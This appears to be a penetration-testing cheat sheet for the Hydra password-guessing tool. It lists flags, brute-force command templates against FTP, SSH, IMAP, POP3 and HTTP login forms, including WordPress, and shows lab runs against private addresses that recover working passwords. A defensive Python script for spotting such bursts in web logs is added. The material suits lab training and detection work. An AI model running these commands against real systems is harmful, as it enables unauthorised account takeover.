🐙HYDRA
-e nsr : try "n" null password, "s" login as pass and/or "r" reversed login
-I : ignore hydra.restore file
-V : very verbose output
-f : stop when a logon is found
-L : username list
-u : rotate around usernames, not passwords
-P : passwords list
example
hydra -I -V -f -L usernames.txt -u -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt 192.168.179.46 ftp
HTTP Modules
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
http[s]-{head|get|post}
http[s]-post-form
hydra http-post-form -U
hydra -L <usernames list> -P <passwords list> -f -u <target ip> -s <port> http-get /
hydra -l <username> -P <password list> -f <target ip> -s <target port> http-post-form "/<login page>:<user parameter>=^USER^&<password parameter>=^PASS^:[F/S]=<failed/success string>"
code
hydra -l admin -P rockyou-50.txt http://10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^::Incorrect username"
Service Authentication Brute Forcing
SSH Attack
code
hydra -L <usernames list> -P <password list> -u -f ssh://<target ip> -t 4
code
hydra -t 1 -L users.txt -P passwords.txt -vV <target ip> ssh
<service>://<target ip>:<port>
Examples
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Hydra Flags:
-l: Login with LOGIN name
-L: Load several logins from FILE
-p: Try password PASS
-P: Load several passwords from FILE
-C: FILE colon separated "login:pass" format, instead of -L/-P options
-u: loop around users, not passwords (effective! implied with -x)
-s: PORT if the service is on a different default port, define it here
-f: exit when a login/pass pair is found
-t: TASKS run TASKS number of connects in parallel per target (default: 16)
-4 / -6: Use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
FTP Attack
code
hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -f ftp://192.168.68.46
example
kali@kali:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -f ftp://192.168.68.46
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-27 17:43:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ftp://192.168.68.46:21/
[21][ftp] host: 192.168.68.46 login: admin password: admin
[STATUS] attack finished for 192.168.68.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-27 17:43:44
kali@kali:~$
HTTP Attack
code
hydra -l jim -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 192.168.135.52 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -vV -f
example
┌──(eo㉿offsec)-[~]
└─$ hydra -l jim -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 192.168.135.52 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -vV -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-09 07:36:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.135.52:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.135.52 - login "jim" - pass "4321" - 751 of 10000 [child 2] (0/0)
[80][http-post-form] host: 192.168.135.52 login: jim password: kimberly
[STATUS] attack finished for 192.168.135.52 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-09 07:37:52
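From the defender's side, the WordPress run above leaves a clear trace: one source IP sending hundreds of POSTs per minute to /wp-login.php, each failure answered with a 200 error page and the one correct guess with a 302 to wp-admin. The following script is an added example (not part of these notes or of Hydra) that finds that pattern in a combined-format access log; the log lines, addresses and thresholds are constructed for the demonstration.

```python
"""Spot Hydra-style http-post-form bursts in a combined-format access log.
Each guess is one POST to the login URL from one source IP, so the signal
is the per-IP POST rate; for wp-login.php a failed guess answers 200 with
the error page (the string Hydra keys on) and a correct one 302 to
wp-admin, so a 302 after many failures marks a likely compromised login."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# combined log: ip ident user [ts] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def analyse(lines, login_path="/wp-login.php", window_s=60, threshold=20):
    """{ip: {peak, fails, hits}} for IPs reaching threshold POSTs per window."""
    windows = defaultdict(deque)          # per-IP timestamps inside the window
    stats = defaultdict(lambda: {"peak": 0, "fails": 0, "hits": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != login_path:
            continue
        ip, ts, st = m["ip"], datetime.strptime(m["ts"], TS_FMT), stats[m["ip"]]
        q = windows[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        st["peak"] = max(st["peak"], len(q))
        if m["status"] != "302":
            st["fails"] += 1
        elif st["fails"] >= threshold:    # success right after a burst of failures
            st["hits"] += 1
    return {ip: st for ip, st in stats.items() if st["peak"] >= threshold}

def sample_log():
    """Constructed lines (RFC 5737 addresses): one attacker burst, one normal login."""
    t0 = datetime.strptime("09/Nov/2022:07:36:59 +0000", TS_FMT)
    def line(ip, t, status):
        return (f'{ip} - - [{t.strftime(TS_FMT)}] "POST /wp-login.php HTTP/1.1" '
                f'{status} 2314 "-" "Mozilla/5.0"')
    lines = [line("198.51.100.5", t0, 302)]                         # real user
    lines += [line("192.0.2.10", t0 + timedelta(seconds=i // 5), 200)  # ~300/min
              for i in range(40)]
    lines.append(line("192.0.2.10", t0 + timedelta(seconds=9), 302))  # guess hit
    return lines

if __name__ == "__main__":
    for ip, st in analyse(sample_log()).items():
        print(f"{ip}: peak {st['peak']}/window, {st['fails']} fails, {st['hits']} hits")
```

The same idea applies to the http-get run further down, where the guesses show up as a burst of 401 responses to one path from one IP rather than 200s.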
example
hydra -l admin -P /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt 192.168.185.46 ftp -f -V
Basic Auth
code
hydra -l offsec -P /usr/share/wordlists/rockyou.txt -s 242 -f 192.168.185.46 http-get /index.php
example
┌──(19:31:43 eo㉿offsec)-[~]
└─$ hydra -l offsec -P /usr/share/wordlists/rockyou.txt -s 242 -f 192.168.185.46 http-get /index.php
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-07 19:31:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.185.46:242/index.php
[STATUS] 1481.00 tries/min, 1481 tries in 00:01h, 14342918 to do in 161:25h, 16 active
[STATUS] 1629.67 tries/min, 4889 tries in 00:03h, 14339510 to do in 146:40h, 16 active
[STATUS] 1674.14 tries/min, 11719 tries in 00:07h, 14332680 to do in 142:42h, 16 active
[242][http-get] host: 192.168.185.46 login: offsec password: elite
[STATUS] attack finished for 192.168.185.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-07 19:46:53
IppSec's Example
code
hydra -C userpass.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"